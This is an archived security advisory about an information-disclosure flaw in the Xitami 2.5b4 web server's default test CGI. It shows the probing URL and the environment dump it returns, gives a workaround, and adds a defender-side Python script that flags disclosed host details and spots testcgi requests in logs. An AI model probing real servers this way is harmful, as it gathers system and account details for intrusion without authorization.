[ SOURCE: http://www.secureroot.com/security/advisories/9762084705.html ]

Xitami Web/FTP Server security vulnerability (testcgi)
------------------------------------------------------------------------

SUMMARY

The default installation of the Xitami web server ships a test CGI in the CGI bin directory that lets remote users view information about the operating system and the web server's directory paths.

DETAILS

Vulnerable systems:
  Xitami WEB/FTP release 2.5b4

Example:
  http://www.example.com/cgi-bin/testcgi

will produce the following output:

  Environment Variables
  COMPUTERNAME = MYSERVER
  COMSPEC = C:\WINNT\system32\cmd.exe
  HOMEDRIVE = C:
  HOMEPATH = \
  LOGONSERVER = \\MYSERVER
  NUMBER_OF_PROCESSORS = 1
  OS = Windows_NT
  OS2LIBPATH = C:\WINNT\system32\os2\dll;
  PATH = C:\WINNT\system32;C:\WINNT
  PROCESSOR_ARCHITECTURE = x86
  PROCESSOR_IDENTIFIER = x86 Family 6 Model 8 Stepping 3, GenuineIntel
  PROCESSOR_LEVEL = 6
  PROCESSOR_REVISION = 0803
  SYSTEMDRIVE = C:
  SYSTEMROOT = C:\WINNT
  TEMP = C:\TEMP
  TMP = C:\TEMP
  USERDOMAIN = MYSERVER
  USERNAME = Administrator
  USERPROFILE = C:\WINNT\Profiles\Administrator
  WINDIR = C:\WINNT
  HTTP_ACCEPT_CHARSET = iso-8859-1,*,utf-8
  HTTP_ACCEPT_LANGUAGE = en
  HTTP_ACCEPT_ENCODING = gzip
  HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
  HTTP_HOST = 127.0.0.1
  HTTP_USER_AGENT = Mozilla/4.75 [en] (WinNT; U)
  HTTP_CONNECTION = Keep-Alive
  HTTP_CONTENT_LENGTH = 0
  SERVER_SOFTWARE = Xitami
  SERVER_VERSION = 2.5b4
  SERVER_NAME = 127.0.0.1
  SERVER_URL = http://127.0.0.1/
  SERVER_PORT = 0
  SERVER_PROTOCOL = HTTP/1.1
  SERVER_SECURITY = -
  GATEWAY_INTERFACE = CGI/1.1
  REQUEST_METHOD = GET
  QUERY_METHOD = GET
  SCRIPT_PATH = cgi-bin
  SCRIPT_NAME = /cgi-bin/testcgi
  CONTENT_TYPE =
  CONTENT_LENGTH = 0
  REMOTE_USER = -
  REMOTE_HOST = 127.0.0.1
  REMOTE_ADDR = 127.0.0.1
  PATH_INFO =
  PATH_TRANSLATED = C:/Xitami/webpages
  DOCUMENT_ROOT = C:/Xitami/webpages
  CGI_ROOT = C:/Xitami/cgi-bin
  CGI_URL = /cgi-bin
  CGI_STDIN = C:\TEMP\pipe0001.cgi
  CGI_STDOUT = C:\TEMP\pipe0001.cgo
  CGI_STDERR = cgierr.log

Workaround:
  Delete the testcgi.exe file, or disable the cgi-bin directory in Xitami Administration under the CGI properties configuration menu.

ADDITIONAL INFORMATION

The information has been provided by zer0-logic.
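As an added example, not part of the original advisory or of Xitami itself: a defender-side Python helper that parses the kind of environment dump testcgi returns, flags which entries reveal host details (OS, account, filesystem paths, server version), and finds requests for /cgi-bin/testcgi in common-log-format access logs so that exposure can be confirmed after the workaround has been applied. The sample output is abridged from the listing above, the log lines are constructed, and the function names are my own.

```python
"""Added example (not from the advisory): parse a testcgi environment dump,
flag the host-describing entries, and spot requests for the test CGI in logs."""
import re

# Constructed sample: an abridged copy of the testcgi output shown in the advisory.
SAMPLE_TESTCGI_OUTPUT = """Environment Variables
COMPUTERNAME = MYSERVER
COMSPEC = C:\\WINNT\\system32\\cmd.exe
OS = Windows_NT
PATH = C:\\WINNT\\system32;C:\\WINNT
USERNAME = Administrator
USERPROFILE = C:\\WINNT\\Profiles\\Administrator
HTTP_HOST = 127.0.0.1
SERVER_SOFTWARE = Xitami
SERVER_VERSION = 2.5b4
SCRIPT_NAME = /cgi-bin/testcgi
DOCUMENT_ROOT = C:/Xitami/webpages
CGI_ROOT = C:/Xitami/cgi-bin
CONTENT_TYPE =
"""

# Variables whose values describe the host rather than the request; these are
# the entries a defender wants to confirm are no longer reachable from outside.
HOST_DISCLOSURE_KEYS = {
    "COMPUTERNAME", "COMSPEC", "OS", "PATH", "USERNAME", "USERPROFILE",
    "SYSTEMROOT", "WINDIR", "TEMP", "TMP", "LOGONSERVER", "USERDOMAIN",
    "SERVER_VERSION", "DOCUMENT_ROOT", "CGI_ROOT", "PATH_TRANSLATED",
    "PROCESSOR_IDENTIFIER",
}


def parse_testcgi_output(text):
    """Turn 'NAME = value' lines into a dict; empty values become ''."""
    env = {}
    for line in text.splitlines():
        if " =" not in line:
            continue  # header line such as 'Environment Variables'
        name, _, value = line.partition(" =")
        env[name.strip()] = value.strip()
    return env


def disclosed_host_details(env):
    """Return the parsed variables that reveal OS, account, path or version info."""
    return {k: v for k, v in env.items() if k in HOST_DISCLOSURE_KEYS and v}


def is_exposed(text):
    """True when a response body looks like testcgi's dump with host details in it."""
    if not text.lstrip().startswith("Environment Variables"):
        return False
    return bool(disclosed_host_details(parse_testcgi_output(text)))


# Common log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths under the advisory's cgi-bin URL that name the test CGI.
TESTCGI_PATHS = {"/cgi-bin/testcgi", "/cgi-bin/testcgi.exe"}


def find_testcgi_requests(log_lines):
    """Return (ip, timestamp, status) for every request whose path is the test CGI."""
    hits = []
    for line in log_lines:
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0].lower()  # drop any query string
        if path in TESTCGI_PATHS:
            hits.append((m.group("ip"), m.group("ts"), int(m.group("status"))))
    return hits


# Constructed sample log lines; addresses are documentation ranges.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Mar/2001:10:00:01 +0000] "GET /index.htm HTTP/1.1" 200 1043',
    '203.0.113.9 - - [11/Mar/2001:10:00:07 +0000] "GET /cgi-bin/testcgi HTTP/1.1" 200 2210',
    '203.0.113.9 - - [11/Mar/2001:10:00:09 +0000] "GET /cgi-bin/testcgi?x=1 HTTP/1.0" 200 2210',
    '198.51.100.4 - - [11/Mar/2001:10:02:13 +0000] "GET /cgi-bin/testcgi HTTP/1.1" 404 312',
]

if __name__ == "__main__":
    env = parse_testcgi_output(SAMPLE_TESTCGI_OUTPUT)
    print("dump exposes host details:", is_exposed(SAMPLE_TESTCGI_OUTPUT))
    for k, v in sorted(disclosed_host_details(env).items()):
        print(f"  {k} = {v}")
    for ip, ts, status in find_testcgi_requests(SAMPLE_LOG):
        print(f"testcgi request from {ip} at {ts} -> HTTP {status}")
```

A 404 in the log output (the last sample line) is what you expect to see once testcgi.exe has been deleted; 200 responses after the workaround indicate the file or the cgi-bin mapping is still in place.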